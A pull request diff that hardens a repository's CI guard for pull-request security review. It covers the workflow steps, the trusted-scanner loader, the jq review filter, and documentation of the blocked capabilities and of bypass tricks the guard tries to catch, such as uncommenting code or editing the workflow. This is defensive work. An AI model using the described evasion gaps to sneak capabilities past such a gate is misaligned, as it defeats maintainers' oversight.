### PR TITLE
security(ci): harden PR security scanning

### DIFF
--- a/.github/workflows/pr-security-review-tests.yml
+++ b/.github/workflows/pr-security-review-tests.yml
@@ -1,0 +1,43 @@
+name: PR security guard tests
+
+# The guard in pr-security-review.yml decides whether an external contribution
+# needs a maintainer security review, so a regression in it is a security
+# regression. These tests run the scanner against synthetic diffs — including
+# the diff-rendering tricks that would otherwise hide a blocked pattern — and
+# execute the workflow's own trusted-scanner loader and review-decision filter.
+on:
+  pull_request:
+    paths:
+      - ".github/workflows/pr-security-review.yml"
+      - ".github/workflows/pr-security-review-tests.yml"
+      - "scripts/check_pr_security_surface.py"
+      - "test/tooling/check_pr_security_surface_test.py"
+  push:
+    branches: [main]
+    paths:
+      - ".github/workflows/pr-security-review.yml"
+      - ".github/workflows/pr-security-review-tests.yml"
+      - "scripts/check_pr_security_surface.py"
+      - "test/tooling/check_pr_security_surface_test.py"
+
+permissions:
+  contents: read
+
+jobs:
+  test:
+    name: PR security guard tooling
+    runs-on: ubuntu-latest
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v7
+
+      - name: Set up Python
+        uses: actions/setup-python@v7
+        with:
+          python-version: "3.11"
+
+      - name: Install test dependencies
+        run: python3 -m pip install --quiet PyYAML
+
+      - name: Run tests
+        run: python3 test/tooling/check_pr_security_surface_test.py

--- a/.github/workflows/pr-security-review-tests.yml
+++ b/.github/workflows/pr-security-review-tests.yml
@@ -12,6 +12,7 @@ on:
       - ".github/workflows/pr-security-review-tests.yml"
       - "scripts/check_pr_security_surface.py"
       - "test/tooling/check_pr_security_surface_test.py"
+      - "test/tooling/check_pr_security_surface_edge_regression_test.py"
   push:
     branches: [main]
     paths:
@@ -19,6 +20,7 @@ on:
       - ".github/workflows/pr-security-review-tests.yml"
       - "scripts/check_pr_security_surface.py"
       - "test/tooling/check_pr_security_surface_test.py"
+      - "test/tooling/check_pr_security_surface_edge_regression_test.py"
 
 permissions:
   contents: read
@@ -40,4 +42,6 @@ jobs:
         run: python3 -m pip install --quiet PyYAML
 
       - name: Run tests
-        run: python3 test/tooling/check_pr_security_surface_test.py
+        run: |
+          python3 test/tooling/check_pr_security_surface_test.py
+          python3 test/tooling/check_pr_security_surface_edge_regression_test.py

--- a/.github/workflows/pr-security-review.yml
+++ b/.github/workflows/pr-security-review.yml
@@ -32,11 +32,20 @@ jobs:
           ref: ${{ github.event.pull_request.head.sha }}
           fetch-depth: 0
 
+      # Never execute the scanner supplied by an untrusted PR. Read the scanner
+      # from the PR's base commit so a contributor cannot weaken the guard in the
+      # same diff that is being inspected.
+      - name: Load trusted scanner from PR base
+        run: |
+          set -euo pipefail
+          git show "$BASE_SHA:scripts/check_pr_security_surface.py" \
+            > "$RUNNER_TEMP/check_pr_security_surface.py"
+
       - name: Scan changed security surfaces
         id: scan
         continue-on-error: true
         run: |
-          python3 scripts/check_pr_security_surface.py \
+          python3 "$RUNNER_TEMP/check_pr_security_surface.py" \
             --base "$BASE_SHA" \
             --head "$HEAD_SHA" \
             --report "$RUNNER_TEMP/security-surface.md" \

--- a/.github/workflows/pr-security-review.yml
+++ b/.github/workflows/pr-security-review.yml
@@ -22,32 +22,70 @@ jobs:
       HEAD_SHA: ${{ github.event.pull_request.head.sha }}
       PR_NUMBER: ${{ github.event.pull_request.number }}
       PR_AUTHOR: ${{ github.event.pull_request.user.login }}
+      HEAD_REPO: ${{ github.event.pull_request.head.repo.full_name }}
       REPO_OWNER: ${{ github.repository_owner }}
       GH_TOKEN: ${{ github.token }}
+      SCANNER_PATH: scripts/check_pr_security_surface.py
+      # Which owner review decides the gate for the current HEAD.
+      #
+      # Only decision-bearing states are considered. A COMMENTED review carries
+      # no decision, so follow-up discussion on an already approved commit must
+      # not silently revoke that approval. CHANGES_REQUESTED and DISMISSED do
+      # revoke it: after a dismissal the owner has to approve the HEAD again.
+      #
+      # Kept in this env block on purpose: test/tooling/check_pr_security_surface_test.py
+      # reads this exact filter out of the workflow and exercises it with jq.
+      REVIEW_DECISION_JQ: |
+        [ .[]
+          | select(.user.login == $owner)
+          | select(.commit_id == $head)
+          | select(.state == "APPROVED" or .state == "CHANGES_REQUESTED" or .state == "DISMISSED")
+        ]
+        | sort_by(.submitted_at, .id)
+        | last
+        | .state // ""
 
     steps:
+      # NOTE ON SCOPE: for `pull_request` events GitHub evaluates the workflow
+      # file from the PR's merge ref, so a PR can edit this file. That is not
+      # something a workflow can defend against from the inside; the protection
+      # is branch protection requiring "Security surface guard" by name, which a
+      # PR cannot satisfy by deleting or renaming the job. What this workflow
+      # does guarantee is that the *scanner* it runs comes from the trusted base.
       - name: Checkout PR head
         uses: actions/checkout@v7
         with:
           ref: ${{ github.event.pull_request.head.sha }}
           fetch-depth: 0
+          persist-credentials: false
 
       # Normal operation always executes the scanner from the trusted PR base,
       # never from an untrusted contributor's HEAD. The one exception is the
       # initial bootstrap PR that introduces this scanner: if the base does not
-      # contain it yet, only a PR authored by the repository owner may use the
-      # HEAD copy. Once this lands on main, external PRs can never take this path.
+      # contain it yet, only a same-repository PR authored by the repository
+      # owner may use the HEAD copy. Once this lands on main, external PRs can
+      # never take this path.
       - name: Load trusted scanner
         shell: bash
         run: |
           set -euo pipefail
           scanner="$RUNNER_TEMP/check_pr_security_surface.py"
 
-          if git cat-file -e "$BASE_SHA:scripts/check_pr_security_surface.py" 2>/dev/null; then
-            git show "$BASE_SHA:scripts/check_pr_security_surface.py" > "$scanner"
+          # Fail closed rather than silently misclassifying: without the base
+          # commit we can neither read the trusted scanner nor diff against it.
+          if ! git cat-file -e "${BASE_SHA}^{commit}" 2>/dev/null; then
+            git fetch --no-tags --quiet origin "$BASE_SHA" 2>/dev/null || true
+          fi
+          if ! git cat-file -e "${BASE_SHA}^{commit}" 2>/dev/null; then
+            echo "::error::Base commit $BASE_SHA is unavailable; refusing to evaluate the security gate on incomplete history."
+            exit 1
+          fi
+
+          if git cat-file -e "$BASE_SHA:$SCANNER_PATH" 2>/dev/null; then
+            git show "$BASE_SHA:$SCANNER_PATH" > "$scanner"
             echo "Loaded security scanner from trusted PR base."
-          elif [ "$PR_AUTHOR" = "$REPO_OWNER" ]; then
-            cp scripts/check_pr_security_surface.py "$scanner"
+          elif [ "$PR_AUTHOR" = "$REPO_OWNER" ] && [ "$HEAD_REPO" = "$GITHUB_REPOSITORY" ]; then
+            cp "$SCANNER_PATH" "$scanner"
             echo "Bootstrap: trusted scanner does not exist on base yet; using repository-owner HEAD copy."
           else
             echo "::error::Trusted security scanner is missing from the PR base. Refusing to execute the contributor-supplied scanner."
@@ -57,7 +95,9 @@ jobs:
       - name: Scan changed security surfaces
         id: scan
         continue-on-error: true
+        shell: bash
         run: |
+          set -euo pipefail
           python3 "$RUNNER_TEMP/check_pr_security_surface.py" \
             --base "$BASE_SHA" \
             --head "$HEAD_SHA" \
@@ -66,46 +106,69 @@ jobs:
 
       - name: Publish security surface report
         if: ${{ always() }}
+        shell: bash
         run: |
           if [ -f "$RUNNER_TEMP/security-surface.md" ]; then
             cat "$RUNNER_TEMP/security-surface.md" >> "$GITHUB_STEP_SUMMARY"
           fi
 
-      # A maintainer approval is deliberately NOT an escape hatch for these.
-      # They introduce unusually powerful execution/CI primitives and must be
-      # redesigned or landed as a separate maintainer-controlled change.
-      - name: Reject blocked high-risk additions
+      # A maintainer approval is deliberately NOT an escape hatch for blocked
+      # patterns. They introduce unusually powerful execution/CI primitives and
+      # must be redesigned or landed as a separate maintainer-controlled change.
+      # A scanner that could not complete lands here too, so a crash fails the
+      # PR instead of quietly reporting an ordinary-risk diff.
+      - name: Reject blocked additions or an incomplete scan
         if: ${{ steps.scan.outcome == 'failure' }}
+        shell: bash
         run: |
-          echo "::error::The PR contains a blocked high-risk security pattern. See the job summary."
+          echo "::error::The PR contains a blocked high-risk security pattern, or the security scan could not complete. See the job summary and the scan step log."
           exit 1
+
+      # Belt and braces: a scanner that exits 0 must have emitted a verdict.
+      # Without this, a missing step output would skip the approval gate.
+      - name: Verify the scan produced a verdict
+        if: ${{ steps.scan.outcome == 'success' }}
+        shell: bash
+        env:
+          SCAN_SENSITIVE: ${{ steps.scan.outputs.sensitive }}
+          SCAN_BLOCKED: ${{ steps.scan.outputs.blocked }}
+        run: |
+          set -euo pipefail
+          case "${SCAN_SENSITIVE}:${SCAN_BLOCKED}" in
+            true:false|false:false) ;;
+            *)
+              echo "::error::The security scanner exited successfully without a usable verdict (sensitive='${SCAN_SENSITIVE}', blocked='${SCAN_BLOCKED}'). Failing closed."
+              exit 1
+              ;;
+          esac
 
       # Ordinary PRs need no extra ceremony. Sensitive external PRs do: the
       # repository owner must approve the exact current HEAD. If the contributor
-      # pushes another commit, the old approval becomes stale and this check
-      # fails again until the new HEAD is reviewed.
+      # pushes another commit, HEAD_SHA changes, the old approval no longer
+      # matches, and this check fails again until the new HEAD is reviewed.
       - name: Require owner approval for sensitive external PR
         if: >-
-          ${{ steps.scan.outputs.sensitive == 'true'
+          ${{ steps.scan.outcome == 'success'
+          && steps.scan.outputs.sensitive == 'true'
           && env.PR_AUTHOR != env.REPO_OWNER }}
         shell: bash
         run: |
           set -euo pipefail
 
-          reviews="$(gh api \
-            "repos/$GITHUB_REPOSITORY/pulls/$PR_NUMBER/reviews?per_page=100")"
+          # --paginate: a PR with more than one page of reviews must not let an
+          # in-page approval outrank a later decision on a page we never read.
+          reviews="$(gh api --paginate \
+            "repos/$GITHUB_REPOSITORY/pulls/$PR_NUMBER/reviews?per_page=100" \
+            | jq -s 'add // []')"
 
           latest_state="$(jq -r \
             --arg owner "$REPO_OWNER" \
             --arg head "$HEAD_SHA" \
-            '[.[]
-              | select(.user.login == $owner and .commit_id == $head)]
-             | sort_by(.submitted_at)
-             | last
-             | .state // ""' <<<"$reviews")"
+            "$REVIEW_DECISION_JQ" <<<"$reviews")"
 
           if [ "$latest_state" != "APPROVED" ]; then
             echo "::error::This PR touches a security-sensitive trust boundary. $REPO_OWNER must approve the current HEAD ($HEAD_SHA) after a focused security review."
+            echo "Latest owner decision for this HEAD: ${latest_state:-none}"
             echo "Sensitive surfaces are listed in the job summary."
             exit 1
           fi

--- a/.github/workflows/pr-security-review.yml
+++ b/.github/workflows/pr-security-review.yml
@@ -32,14 +32,27 @@ jobs:
           ref: ${{ github.event.pull_request.head.sha }}
           fetch-depth: 0
 
-      # Never execute the scanner supplied by an untrusted PR. Read the scanner
-      # from the PR's base commit so a contributor cannot weaken the guard in the
-      # same diff that is being inspected.
-      - name: Load trusted scanner from PR base
+      # Normal operation always executes the scanner from the trusted PR base,
+      # never from an untrusted contributor's HEAD. The one exception is the
+      # initial bootstrap PR that introduces this scanner: if the base does not
+      # contain it yet, only a PR authored by the repository owner may use the
+      # HEAD copy. Once this lands on main, external PRs can never take this path.
+      - name: Load trusted scanner
+        shell: bash
         run: |
           set -euo pipefail
-          git show "$BASE_SHA:scripts/check_pr_security_surface.py" \
-            > "$RUNNER_TEMP/check_pr_security_surface.py"
+          scanner="$RUNNER_TEMP/check_pr_security_surface.py"
+
+          if git cat-file -e "$BASE_SHA:scripts/check_pr_security_surface.py" 2>/dev/null; then
+            git show "$BASE_SHA:scripts/check_pr_security_surface.py" > "$scanner"
+            echo "Loaded security scanner from trusted PR base."
+          elif [ "$PR_AUTHOR" = "$REPO_OWNER" ]; then
+            cp scripts/check_pr_security_surface.py "$scanner"
+            echo "Bootstrap: trusted scanner does not exist on base yet; using repository-owner HEAD copy."
+          else
+            echo "::error::Trusted security scanner is missing from the PR base. Refusing to execute the contributor-supplied scanner."
+            exit 1
+          fi
 
       - name: Scan changed security surfaces
         id: scan

--- a/.github/workflows/pr-security-review.yml
+++ b/.github/workflows/pr-security-review.yml
@@ -46,12 +46,23 @@ jobs:
         | .state // ""
 
     steps:
-      # NOTE ON SCOPE: for `pull_request` events GitHub evaluates the workflow
-      # file from the PR's merge ref, so a PR can edit this file. That is not
-      # something a workflow can defend against from the inside; the protection
-      # is branch protection requiring "Security surface guard" by name, which a
-      # PR cannot satisfy by deleting or renaming the job. What this workflow
-      # does guarantee is that the *scanner* it runs comes from the trusted base.
+      # NOTE ON SCOPE — read before relying on this as the only gate.
+      #
+      # For `pull_request` events GitHub evaluates the workflow definition from
+      # the PR's merge ref, so a PR can edit this file. A contributor can keep
+      # the workflow and job name while replacing these steps with a no-op, and
+      # a required status check matched only by name would then go green without
+      # the trusted scanner ever running. Requiring "Security surface guard" by
+      # name is therefore NOT sufficient on its own, and no change inside this
+      # file can make it sufficient.
+      #
+      # Closing that hole is a repository setting: a ruleset whose required
+      # workflow is pinned to a trusted ref, so the definition that runs is the
+      # one a PR cannot edit. docs/pr-security-guard.md has the setup.
+      #
+      # What this workflow does guarantee on its own is narrower but real: the
+      # *scanner* it runs is read from the trusted base commit, so a PR cannot
+      # weaken the classifier in the same change it is trying to sneak past it.
       - name: Checkout PR head
         uses: actions/checkout@v7
         with:

--- a/.github/workflows/pr-security-review.yml
+++ b/.github/workflows/pr-security-review.yml
@@ -1,0 +1,94 @@
+name: PR security review
+
+on:
+  pull_request:
+    types: [opened, synchronize, reopened, ready_for_review]
+  pull_request_review:
+    types: [submitted, dismissed]
+
+# Fork-safe: this workflow only reads the checkout and PR review metadata.
+# It never receives repository secrets and cannot write repository contents.
+permissions:
+  contents: read
+  pull-requests: read
+
+jobs:
+  security-surface:
+    name: Security surface guard
+    runs-on: ubuntu-latest
+    if: ${{ !github.event.pull_request.draft }}
+    env:
+      BASE_SHA: ${{ github.event.pull_request.base.sha }}
+      HEAD_SHA: ${{ github.event.pull_request.head.sha }}
+      PR_NUMBER: ${{ github.event.pull_request.number }}
+      PR_AUTHOR: ${{ github.event.pull_request.user.login }}
+      REPO_OWNER: ${{ github.repository_owner }}
+      GH_TOKEN: ${{ github.token }}
+
+    steps:
+      - name: Checkout PR head
+        uses: actions/checkout@v7
+        with:
+          ref: ${{ github.event.pull_request.head.sha }}
+          fetch-depth: 0
+
+      - name: Scan changed security surfaces
+        id: scan
+        continue-on-error: true
+        run: |
+          python3 scripts/check_pr_security_surface.py \
+            --base "$BASE_SHA" \
+            --head "$HEAD_SHA" \
+            --report "$RUNNER_TEMP/security-surface.md" \
+            --github-output "$GITHUB_OUTPUT"
+
+      - name: Publish security surface report
+        if: ${{ always() }}
+        run: |
+          if [ -f "$RUNNER_TEMP/security-surface.md" ]; then
+            cat "$RUNNER_TEMP/security-surface.md" >> "$GITHUB_STEP_SUMMARY"
+          fi
+
+      # A maintainer approval is deliberately NOT an escape hatch for these.
+      # They introduce unusually powerful execution/CI primitives and must be
+      # redesigned or landed as a separate maintainer-controlled change.
+      - name: Reject blocked high-risk additions
+        if: ${{ steps.scan.outcome == 'failure' }}
+        run: |
+          echo "::error::The PR contains a blocked high-risk security pattern. See the job summary."
+          exit 1
+
+      # Ordinary PRs need no extra ceremony. Sensitive external PRs do: the
+      # repository owner must approve the exact current HEAD. If the contributor
+      # pushes another commit, the old approval becomes stale and this check
+      # fails again until the new HEAD is reviewed.
+      - name: Require owner approval for sensitive external PR
+        if: >-
+          ${{ steps.scan.outputs.sensitive == 'true'
+          && env.PR_AUTHOR != env.REPO_OWNER }}
+        shell: bash
+        run: |
+          set -euo pipefail
+
+          reviews="$(gh api \
+            "repos/$GITHUB_REPOSITORY/pulls/$PR_NUMBER/reviews?per_page=100")"
+
+          latest_state="$(jq -r \
+            --arg owner "$REPO_OWNER" \
+            --arg head "$HEAD_SHA" \
+            '[.[]
+              | select(.user.login == $owner and .commit_id == $head)]
+             | sort_by(.submitted_at)
+             | last
+             | .state // ""' <<<"$reviews")"
+
+          if [ "$latest_state" != "APPROVED" ]; then
+            echo "::error::This PR touches a security-sensitive trust boundary. $REPO_OWNER must approve the current HEAD ($HEAD_SHA) after a focused security review."
+            echo "Sensitive surfaces are listed in the job summary."
+            exit 1
+          fi
+
+          echo "Current sensitive HEAD was explicitly approved by $REPO_OWNER."
+
+      - name: Security review gate passed
+        run: echo "PR security review gate passed."

--- a/docs/README.md
+++ b/docs/README.md
@@ -46,5 +46,6 @@ The full index of Linthra's docs. New to the project? Start with the
 | Manual QA checklist | [manual-test-checklist.md](./manual-test-checklist.md) |
 | Release process & signing | [release-process.md](./release-process.md) · [signing](./release-signing.md) |
 | Dependency update bots | [dependency-updates.md](./dependency-updates.md) |
+| PR security surface guard | [pr-security-guard.md](./pr-security-guard.md) |
 | F-Droid readiness | [fdroid-readiness.md](./fdroid-readiness.md) |
 | Google Play readiness | [play-store-readiness.md](./play-store-readiness.md) |

--- a/docs/pr-security-guard.md
+++ b/docs/pr-security-guard.md
@@ -30,14 +30,13 @@ lives in `scripts/check_pr_security_surface.py`; its tests are
   overlaps a line the PR added. A construct assembled partly from tokens that
   were already in the file is therefore caught, while code the PR never touched
   is left alone.
-- **A net deletion is treated as a change too.** Removing a comment opener or a
-  disabled branch can make an untouched call live without retyping it. When a
-  PR removes lines from a file that holds a blocked construct on lines it did
-  not touch, that file is marked sensitive and a maintainer is asked to look.
-  Deciding whether the construct actually became reachable would need a real
-  Dart parser, so the guard asks rather than guesses. Eight files in the
-  repository currently carry such a construct, seven of them under
-  `test/tooling/`.
+- **Touching a file that already holds a blocked construct needs review.** A
+  change elsewhere in a file can make untouched code live without retyping it —
+  deleting a comment opener does it, and so does flipping `if (false)` to
+  `if (true)`, which loses no lines at all. Enumerating the ways would mean
+  deciding reachability, which a regex cannot do, so any change to such a file
+  is marked sensitive and a maintainer is asked to look. Eight files in the
+  repository currently qualify, seven of them under `test/tooling/`.
 - **It fails closed.** A missing base commit, an undecodable diff header, a
   scanner crash, or a scan that ends without a verdict all fail the job.
 
@@ -111,7 +110,8 @@ pattern, cover the diff-rendering tricks that would otherwise hide an added
 line (quoted pathnames, pathname bytes that are not valid UTF-8,
 `.gitattributes` `-diff`, renames, comments wedged between tokens, and
 constructs split across lines, across hunks, completed from untouched context,
-or activated by deletion), and execute the workflow's own trusted-scanner
+or activated by an edit elsewhere in the file), and execute the workflow's
+own trusted-scanner
 loader and review-decision filter straight out of the YAML.
 
 One constraint is easy to trip over: the guard scans the content of every

--- a/docs/pr-security-guard.md
+++ b/docs/pr-security-guard.md
@@ -10,13 +10,17 @@ lives in `scripts/check_pr_security_surface.py`; its tests are
 
 - **Ordinary PRs pass untouched.** UI, tests and docs changes produce
   `sensitive=false` and the gate is a no-op.
-- **Sensitive surfaces need a review.** Changes to CI, automation scripts,
-  dependency manifests, Android permissions, native Linux code, or to
+- **Sensitive surfaces need a review.** Changes to CI, automation trees
+  (`scripts/`, `tool/`, `tools/`), dependency manifests, build toolchain pins
+  (`.flutter-version`, `.java-version`, the Gradle wrapper and its
+  `distributionUrl`), Android permissions, native Linux code, or to
   auth/network/persistence code — and added behaviour such as new network
   clients, filesystem writes or database migrations — require **TheZupZup to
   have approved the exact current HEAD**. Pushing a new commit changes the
   HEAD, so the previous approval no longer applies.
-- **A few additions are rejected outright.** Runtime process/shell execution,
+- **A few additions are rejected outright.** Runtime process execution, shell
+  execution enabled by a flag (an explicit `false` is not a capability and is
+  not blocked),
   FFI and dynamic library loading, the privileged pull-request trigger variant
   (`pull_request` + `_target`), Actions `write-all` permissions, and
   download-and-execute shell patterns are not bypassable by approval. If

--- a/docs/pr-security-guard.md
+++ b/docs/pr-security-guard.md
@@ -18,6 +18,7 @@ lives in `scripts/check_pr_security_surface.py`; its tests are
   (`.flutter-version`, `.java-version`, the Gradle wrapper and its
   `distributionUrl`), Cargo manifests and lockfiles, Android permissions, the
   `res/xml/` security and privacy policy and the Kotlin shipped in the APK,
+  the analyzer configuration, licence text and release signing material,
   native code under `linux/` and `native/` with its CMake build files, or to
   auth/network/persistence code — and added behaviour such as new network
   clients, filesystem writes or database migrations — require **TheZupZup to

--- a/docs/pr-security-guard.md
+++ b/docs/pr-security-guard.md
@@ -30,6 +30,14 @@ lives in `scripts/check_pr_security_surface.py`; its tests are
   overlaps a line the PR added. A construct assembled partly from tokens that
   were already in the file is therefore caught, while code the PR never touched
   is left alone.
+- **A net deletion is treated as a change too.** Removing a comment opener or a
+  disabled branch can make an untouched call live without retyping it. When a
+  PR removes lines from a file that holds a blocked construct on lines it did
+  not touch, that file is marked sensitive and a maintainer is asked to look.
+  Deciding whether the construct actually became reachable would need a real
+  Dart parser, so the guard asks rather than guesses. Eight files in the
+  repository currently carry such a construct, seven of them under
+  `test/tooling/`.
 - **It fails closed.** A missing base commit, an undecodable diff header, a
   scanner crash, or a scan that ends without a verdict all fail the job.
 
@@ -67,6 +75,21 @@ copy of the workflow.
 Changes to the guard's own files are classified sensitive, so an external PR
 touching them needs a maintainer security review regardless.
 
+## What it does not do
+
+The blocked list is a backstop against careless or opportunistic additions, not
+a decision procedure against a determined attacker. It matches patterns; it does
+not parse Dart or shell. A capability assembled through intermediate variables
+across statements, or a download separated from its execution by more than the
+rule's window, can still get past it.
+
+What actually bounds the risk is structural, and is described above: the scanner
+is loaded from the trusted base, sensitive surfaces need an owner approval tied
+to the exact HEAD, and — once configured — the required-workflow ruleset means a
+PR cannot replace the gate that judges it. Treat a gap in the pattern list as a
+bug worth fixing, not as the thing standing between the repository and a
+motivated contributor.
+
 ## Bootstrap
 
 The first PR to introduce the scanner cannot load it from a base that does not
@@ -85,10 +108,11 @@ python3 test/tooling/check_pr_security_surface_test.py
 
 They build synthetic git repositories for every classification and blocked
 pattern, cover the diff-rendering tricks that would otherwise hide an added
-line (quoted pathnames, `.gitattributes` `-diff`, renames, comments wedged between
-tokens, and constructs split across lines, across hunks, or completed from
-untouched context), and execute the workflow's own trusted-scanner loader and
-review-decision filter straight out of the YAML.
+line (quoted pathnames, pathname bytes that are not valid UTF-8,
+`.gitattributes` `-diff`, renames, comments wedged between tokens, and
+constructs split across lines, across hunks, completed from untouched context,
+or activated by deletion), and execute the workflow's own trusted-scanner
+loader and review-decision filter straight out of the YAML.
 
 One constraint is easy to trip over: the guard scans the content of every
 changed file, **including its own sources**. A blocked pattern written out in

--- a/docs/pr-security-guard.md
+++ b/docs/pr-security-guard.md
@@ -46,9 +46,11 @@ lives in `scripts/check_pr_security_surface.py`; its tests are
 
   The sensitive patterns get a narrower version of the same treatment: they
   match in 356 files, so asking on every edit near one would make the ordinary
-  PR a reviewed PR. There, only a PR that *removes* lines from such a file is
-  asked about — enough to catch uncommenting existing code, which is what
-  deleting delimiters does.
+  PR a reviewed PR. There, the trigger is specific — the PR removed a line that
+  had been *suppressing* code: a block or markup comment delimiter, a disabled
+  preprocessor branch, an `if (false)` guard. That catches uncommenting however
+  it is spelled, including replacing the delimiters with blank lines, while an
+  ordinary edit or deletion beside such code stays ordinary.
 - **It fails closed.** A missing base commit, an undecodable diff header, a
   scanner crash, or a scan that ends without a verdict all fail the job.
 

--- a/docs/pr-security-guard.md
+++ b/docs/pr-security-guard.md
@@ -18,12 +18,20 @@ lives in `scripts/check_pr_security_surface.py`; its tests are
   (`.flutter-version`, `.java-version`, the Gradle wrapper and its
   `distributionUrl`), Cargo manifests and lockfiles, Android permissions, the
   `res/xml/` security and privacy policy and the Kotlin shipped in the APK,
-  the analyzer configuration, licence text and release signing material,
+  the analyzer configuration, licence text, release signing material and the
+  F-Droid build recipe under `metadata/`,
   native code under `linux/` and `native/` with its CMake build files, or to
   auth/network/persistence code — and added behaviour such as new network
   clients, filesystem writes or database migrations — require **TheZupZup to
   have approved the exact current HEAD**. Pushing a new commit changes the
   HEAD, so the previous approval no longer applies.
+- **Naming a blocked capability in prose is not using it.** In a documentation
+  or plain-text file, a blocked pattern is downgraded to a review rather than a
+  rejection — a page listing forbidden APIs has to spell them out. It is
+  downgraded, not ignored: a README telling a reader to pipe a download into a
+  shell still gets an owner's attention. Inside source files the block stands,
+  whatever the surrounding comment or string context, because deciding that
+  needs a lexer and a wrong answer there is a bypass.
 - **A few additions are rejected outright.** Runtime process execution, shell
   execution enabled by a flag (an explicit `false` is not a capability and is
   not blocked),

--- a/docs/pr-security-guard.md
+++ b/docs/pr-security-guard.md
@@ -13,7 +13,8 @@ lives in `scripts/check_pr_security_surface.py`; its tests are
 - **Sensitive surfaces need a review.** Changes to CI, automation trees
   (`scripts/`, `tool/`, `tools/`), dependency manifests, build toolchain pins
   (`.flutter-version`, `.java-version`, the Gradle wrapper and its
-  `distributionUrl`), Android permissions, native Linux code, or to
+  `distributionUrl`), Cargo manifests and lockfiles, Android permissions,
+  native code under `linux/` and `native/` with its CMake build files, or to
   auth/network/persistence code — and added behaviour such as new network
   clients, filesystem writes or database migrations — require **TheZupZup to
   have approved the exact current HEAD**. Pushing a new commit changes the

--- a/docs/pr-security-guard.md
+++ b/docs/pr-security-guard.md
@@ -13,9 +13,10 @@ lives in `scripts/check_pr_security_surface.py`; its tests are
 - **Sensitive surfaces need a review.** Changes to CI, automation trees
   (`scripts/`, `tool/`, `tools/`), dependency manifests, build toolchain pins
   (`.flutter-version`, `.java-version`, the Gradle wrapper and its
-  `distributionUrl`), Cargo manifests and lockfiles, Android permissions and
-  the `res/xml/` security and privacy policy, native code under `linux/` and
-  `native/` with its CMake build files, or to auth/network/persistence code — and added behaviour such as new network
+  `distributionUrl`), Cargo manifests and lockfiles, Android permissions, the
+  `res/xml/` security and privacy policy and the Kotlin shipped in the APK,
+  native code under `linux/` and `native/` with its CMake build files, or to
+  auth/network/persistence code — and added behaviour such as new network
   clients, filesystem writes or database migrations — require **TheZupZup to
   have approved the exact current HEAD**. Pushing a new commit changes the
   HEAD, so the previous approval no longer applies.

--- a/docs/pr-security-guard.md
+++ b/docs/pr-security-guard.md
@@ -10,7 +10,10 @@ lives in `scripts/check_pr_security_surface.py`; its tests are
 
 - **Ordinary PRs pass untouched.** UI, tests and docs changes produce
   `sensitive=false` and the gate is a no-op.
-- **Sensitive surfaces need a review.** Changes to CI, automation trees
+- **Sensitive surfaces need a review.** Changes to anything under `.github/`
+  except issue templates and funding metadata (workflows, composite actions,
+  Dependabot config, and the agent prompts CI feeds to `openai/codex-action`),
+  automation trees
   (`scripts/`, `tool/`, `tools/`), dependency manifests, build toolchain pins
   (`.flutter-version`, `.java-version`, the Gradle wrapper and its
   `distributionUrl`), Cargo manifests and lockfiles, Android permissions, the

--- a/docs/pr-security-guard.md
+++ b/docs/pr-security-guard.md
@@ -13,9 +13,9 @@ lives in `scripts/check_pr_security_surface.py`; its tests are
 - **Sensitive surfaces need a review.** Changes to CI, automation trees
   (`scripts/`, `tool/`, `tools/`), dependency manifests, build toolchain pins
   (`.flutter-version`, `.java-version`, the Gradle wrapper and its
-  `distributionUrl`), Cargo manifests and lockfiles, Android permissions,
-  native code under `linux/` and `native/` with its CMake build files, or to
-  auth/network/persistence code — and added behaviour such as new network
+  `distributionUrl`), Cargo manifests and lockfiles, Android permissions and
+  the `res/xml/` security and privacy policy, native code under `linux/` and
+  `native/` with its CMake build files, or to auth/network/persistence code — and added behaviour such as new network
   clients, filesystem writes or database migrations — require **TheZupZup to
   have approved the exact current HEAD**. Pushing a new commit changes the
   HEAD, so the previous approval no longer applies.
@@ -42,6 +42,12 @@ lives in `scripts/check_pr_security_surface.py`; its tests are
   deciding reachability, which a regex cannot do, so any change to such a file
   is marked sensitive and a maintainer is asked to look. Eight files in the
   repository currently qualify, seven of them under `test/tooling/`.
+
+  The sensitive patterns get a narrower version of the same treatment: they
+  match in 356 files, so asking on every edit near one would make the ordinary
+  PR a reviewed PR. There, only a PR that *removes* lines from such a file is
+  asked about — enough to catch uncommenting existing code, which is what
+  deleting delimiters does.
 - **It fails closed.** A missing base commit, an undecodable diff header, a
   scanner crash, or a scan that ends without a verdict all fail the job.
 

--- a/docs/pr-security-guard.md
+++ b/docs/pr-security-guard.md
@@ -25,6 +25,11 @@ lives in `scripts/check_pr_security_surface.py`; its tests are
 - **The scanner comes from the trusted base.** The workflow reads
   `scripts/check_pr_security_surface.py` out of the PR's base commit, so a PR
   cannot weaken the classifier in the same change it is trying to pass.
+- **It reads post-change source, not just `+` lines.** Rules run against each
+  changed file's content at the PR head, and a match is reported only when it
+  overlaps a line the PR added. A construct assembled partly from tokens that
+  were already in the file is therefore caught, while code the PR never touched
+  is left alone.
 - **It fails closed.** A missing base commit, an undecodable diff header, a
   scanner crash, or a scan that ends without a verdict all fail the job.
 
@@ -80,11 +85,12 @@ python3 test/tooling/check_pr_security_surface_test.py
 
 They build synthetic git repositories for every classification and blocked
 pattern, cover the diff-rendering tricks that would otherwise hide an added
-line (quoted pathnames, `.gitattributes` `-diff`, renames, constructs split
-across lines and hunks), and execute the workflow's own trusted-scanner loader
-and review-decision filter straight out of the YAML.
+line (quoted pathnames, `.gitattributes` `-diff`, renames, comments wedged between
+tokens, and constructs split across lines, across hunks, or completed from
+untouched context), and execute the workflow's own trusted-scanner loader and
+review-decision filter straight out of the YAML.
 
-One constraint is easy to trip over: the guard scans every added line of every
+One constraint is easy to trip over: the guard scans the content of every
 changed file, **including its own sources**. A blocked pattern written out in
 full in the scanner, the workflow, or the tests would make the guard reject any
 PR that touches the guard. `_split_literal()` in the scanner and `blocked()` in

--- a/docs/pr-security-guard.md
+++ b/docs/pr-security-guard.md
@@ -1,0 +1,92 @@
+# PR security surface guard
+
+`.github/workflows/pr-security-review.yml` decides whether a pull request
+crosses a trust boundary that deserves an explicit maintainer security review,
+and hard-rejects a small set of unusually powerful additions. The classifier
+lives in `scripts/check_pr_security_surface.py`; its tests are
+`test/tooling/check_pr_security_surface_test.py`.
+
+## What it does
+
+- **Ordinary PRs pass untouched.** UI, tests and docs changes produce
+  `sensitive=false` and the gate is a no-op.
+- **Sensitive surfaces need a review.** Changes to CI, automation scripts,
+  dependency manifests, Android permissions, native Linux code, or to
+  auth/network/persistence code — and added behaviour such as new network
+  clients, filesystem writes or database migrations — require **TheZupZup to
